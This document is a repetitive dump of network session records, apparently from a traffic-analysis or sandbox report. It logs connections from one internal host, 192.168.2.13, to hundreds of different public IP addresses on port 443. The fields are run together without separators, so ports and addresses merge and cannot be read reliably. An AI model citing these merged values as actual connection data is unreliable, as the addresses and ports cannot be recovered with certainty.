                                                13737192.168.2.1341324144.102.212.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13738192.168.2.1333582115.31.249.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13739192.168.2.1352676181.36.170.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13740192.168.2.135750297.148.5.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13741192.168.2.134537285.73.244.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13742192.168.2.133770476.187.73.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13743192.168.2.13447128.61.134.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13744192.168.2.1358314157.118.197.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13745192.168.2.1349066150.199.149.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13746192.168.2.133330027.66.128.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13747192.168.2.1334350196.2.158.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13748192.168.2.1335620179.242.61.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13749192.168.2.13580921.141.99.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13750192.168.2.133546412.46.158.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13751192.168.2.1336160184.109.151.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13752192.168.2.134215444.218.69.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13753192.168.2.1346300154.151.142.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13754192.168.2.1348718194.223.10.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13755192.168.2.135473497.214.196.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13756192.168.2.134757031.51.10.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13757192.168.2.1341134194.200.110.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13758192.168.2.1341772115.25.150.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13759192.168.2.134480883.72.224.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13760192.168.2.1344846122.9.111.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13761192.168.2.1360222109.91.242.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13762192.168.2.135024458.186.213.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13763192.168.2.1355336128.57.156.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13764192.168.2.1341342171.204.173.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13765192.168.2.133564674.39.48.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13766192.168.2.134812672.69.217.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13767192.168.2.134394084.84.22.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13768192.168.2.134742854.160.175.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13769192.168.2.1349354181.190.57.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13770192.168.2.135399036.189.231.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13771192.168.2.135455886.6.251.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13772192.168.2.135082487.57.12.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13773192.168.2.1336040205.227.138.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13774192.168.2.135261081.42.198.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13775192.168.2.1355318198.47.227.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13776192.168.2.135662698.126.222.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13777192.168.2.135423837.117.198.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13778192.168.2.134612254.116.175.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13779192.168.2.1336548121.229.196.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13780192.168.2.1333806180.6.237.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13781192.168.2.135205443.39.237.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13782192.168.2.1355414222.26.73.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13783192.168.2.135258231.190.151.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13784192.168.2.13576581.238.239.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13785192.168.2.133783445.55.110.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13786192.168.2.1345332211.34.90.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13787192.168.2.134988879.66.55.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13788192.168.2.134393071.35.202.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13789192.168.2.135100445.9.53.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13790192.168.2.1346432106.208.87.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13791192.168.2.135102652.3.229.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13792192.168.2.1333440142.32.152.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13793192.168.2.1354896102.167.147.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13794192.168.2.1345164177.251.102.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13795192.168.2.1341336222.243.204.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13796192.168.2.135871095.202.141.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13797192.168.2.1346598162.150.34.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13798192.168.2.136005068.151.86.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13799192.168.2.1342046172.172.170.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13800192.168.2.134357250.46.221.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13801192.168.2.1352202109.87.78.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13802192.168.2.135973669.123.250.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13803192.168.2.1355628195.148.132.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13804192.168.2.1360314108.144.65.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13805192.168.2.135217842.191.211.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13806192.168.2.1346160153.86.153.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13807192.168.2.1353346122.75.206.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13808192.168.2.1354072184.87.143.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13809192.168.2.1344712192.7.223.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13810192.168.2.1336932151.186.78.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13811192.168.2.1335798148.249.147.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13812192.168.2.1337814191.124.26.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13813192.168.2.135668460.177.49.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13814192.168.2.1357262133.83.190.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13815192.168.2.1340502199.215.83.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13816192.168.2.1353168101.65.232.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13817192.168.2.135711627.5.106.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13818192.168.2.134406461.244.37.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13819192.168.2.13474902.239.15.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13820192.168.2.133666832.183.76.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13821192.168.2.1359582110.124.122.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13822192.168.2.1342750120.30.94.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13823192.168.2.1337364145.34.132.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13824192.168.2.134922035.196.235.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13825192.168.2.136059241.3.17.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13826192.168.2.135403480.74.28.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13827192.168.2.1342206211.255.139.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13828192.168.2.134672278.90.99.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13829192.168.2.134184282.107.241.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13830192.168.2.1334840221.192.60.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13831192.168.2.1333604168.40.193.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13832192.168.2.134897878.125.80.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13833192.168.2.1347350162.106.41.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13834192.168.2.135165837.175.86.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13835192.168.2.1339488106.47.35.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13836192.168.2.1353152165.229.26.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13837192.168.2.135434241.85.53.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13838192.168.2.1339978158.143.207.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13839192.168.2.134355479.127.181.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13840192.168.2.1341226138.250.19.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13841192.168.2.135737261.203.230.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13842192.168.2.1344574216.235.172.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13843192.168.2.1339424220.10.23.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13844192.168.2.1359160135.187.82.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13845192.168.2.1342984203.22.157.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13846192.168.2.1358400183.163.227.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13847192.168.2.135772234.78.224.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13848192.168.2.1359306180.166.235.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13849192.168.2.1346994197.93.164.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13850192.168.2.1352050147.76.139.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13851192.168.2.1356632198.96.251.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13852192.168.2.133726082.204.110.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13853192.168.2.134463448.140.151.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13854192.168.2.1350964221.192.86.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13855192.168.2.1340826137.226.147.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13856192.168.2.13371545.130.158.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13857192.168.2.1335100122.175.22.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13858192.168.2.1333310123.218.235.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13859192.168.2.135358425.233.221.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13860192.168.2.1358336178.63.178.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13861192.168.2.1358268136.210.238.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13862192.168.2.1337866145.35.208.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13863192.168.2.1354870218.34.182.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13864192.168.2.1351416144.226.76.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13865192.168.2.1351762118.134.69.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13866192.168.2.1340364183.3.132.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13867192.168.2.135686679.124.54.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13868192.168.2.1345516210.14.181.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13869192.168.2.135621440.155.196.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13870192.168.2.1341446118.32.115.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13871192.168.2.135233848.249.145.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13872192.168.2.1336080213.161.200.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13873192.168.2.1341424196.153.235.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13874192.168.2.1345568165.46.9.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13875192.168.2.1334366149.94.114.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13876192.168.2.134859449.87.119.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13877192.168.2.1348958198.220.206.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13878192.168.2.1355646155.205.49.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13879192.168.2.1344042175.129.158.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13880192.168.2.1337048178.174.65.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13881192.168.2.1340674109.36.54.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13882192.168.2.135651659.98.88.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13883192.168.2.134533873.208.78.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13884192.168.2.1337264221.38.249.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13885192.168.2.1345338207.191.70.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13886192.168.2.1353254187.10.181.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13887192.168.2.1335344172.178.196.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13888192.168.2.1354380186.238.58.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13889192.168.2.1356470172.46.15.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13890192.168.2.1333980178.4.102.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13891192.168.2.133901627.203.38.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13892192.168.2.135717094.154.199.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13893192.168.2.134478890.243.110.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13894192.168.2.134779851.172.108.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13895192.168.2.1358976183.89.203.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13896192.168.2.1334872185.84.86.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13897192.168.2.1336168128.49.148.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13898192.168.2.1357720139.184.253.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13899192.168.2.13403844.71.142.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13900192.168.2.135896081.178.130.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13901192.168.2.1351108115.2.101.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13902192.168.2.133795070.248.58.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13903192.168.2.133746618.98.14.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13904192.168.2.1350416183.120.127.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13905192.168.2.133471613.174.109.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13906192.168.2.135513695.33.179.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13907192.168.2.134219872.143.180.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13908192.168.2.1338232119.241.70.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13909192.168.2.1355176193.193.19.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13910192.168.2.13587068.4.18.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13911192.168.2.1338816191.184.228.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13912192.168.2.135137852.144.52.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13913192.168.2.1338788119.30.55.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13914192.168.2.1346476202.217.226.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13915192.168.2.134413878.137.65.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13916192.168.2.1358888210.9.176.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13917192.168.2.134373435.49.31.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13918192.168.2.133616484.216.42.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13919192.168.2.134646061.58.118.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13920192.168.2.134719293.19.101.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13921192.168.2.134183868.46.103.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13922192.168.2.1343556175.174.235.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13923192.168.2.1344772115.109.111.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13924192.168.2.1339152167.26.161.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13925192.168.2.135723671.232.11.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13926192.168.2.135851096.17.38.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13927192.168.2.1344134160.96.128.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13928192.168.2.1357874217.229.220.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13929192.168.2.133492025.153.175.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13930192.168.2.1355546177.118.230.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13931192.168.2.1333060172.204.112.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13932192.168.2.133960869.174.11.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13933192.168.2.1344434153.248.35.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13934192.168.2.1351748206.226.152.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13935192.168.2.1338768146.16.165.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13936192.168.2.134196288.238.152.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13937192.168.2.135037839.132.127.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13938192.168.2.1342286147.2.0.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13939192.168.2.135078668.117.192.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13940192.168.2.1342596208.18.236.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13941192.168.2.133954053.43.155.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13942192.168.2.133303089.252.129.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13943192.168.2.1340180212.81.110.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13944192.168.2.1335474125.222.152.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13945192.168.2.1347660134.108.192.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13946192.168.2.1348806205.19.39.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13947192.168.2.1352214133.134.243.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13948192.168.2.1355520152.87.214.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13949192.168.2.1335086140.120.3.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13950192.168.2.1336024179.217.46.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13951192.168.2.1337024104.174.62.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13952192.168.2.134963481.246.112.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13953192.168.2.1342282218.81.8.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13954192.168.2.1339304117.61.147.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13955192.168.2.1340288129.137.175.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13956192.168.2.1348424217.205.192.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13957192.168.2.1344040122.113.49.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13958192.168.2.134005062.182.130.200443
                                                TimestampBytes transferredDirectionData


